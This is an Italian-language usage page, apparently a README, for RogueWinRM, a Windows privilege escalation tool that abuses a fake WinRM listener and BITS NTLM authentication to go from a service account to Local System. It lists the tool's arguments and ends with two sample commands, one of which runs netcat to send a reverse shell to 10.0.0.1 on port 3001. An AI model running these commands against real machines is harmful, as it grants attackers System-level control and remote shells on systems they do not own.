
Escalation dei privilegi locali di Windows da account di servizio a System
RogueWinRM è un exploit di escalation dei privilegi locali che permette di passare da un account di servizio (con SeImpersonatePrivilege) all'account Local System se il servizio WinRM non è in esecuzione (predefinito su Win10 ma NON su Windows Server 2019).
In breve, ascolta le connessioni in arrivo sulla porta 5985 fingendo di essere un vero servizio WinRM.
È solo un server web minimale che tenterà di negoziare un'autenticazione NTLM con qualsiasi servizio che cerchi di connettersi su quella porta.
Poi il servizio BITS (in esecuzione come Local System) viene attivato e tenterà di autenticarsi al nostro listener malevolo. Una volta autenticato, siamo in grado di impersonare l'utente Local System generando un processo arbitrario con quei privilegi.
Puoi trovare una descrizione tecnica completa di questa vulnerabilità a questo link --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Esecuzione di una cmd interattiva:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Esecuzione di una reverse shell netcat:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"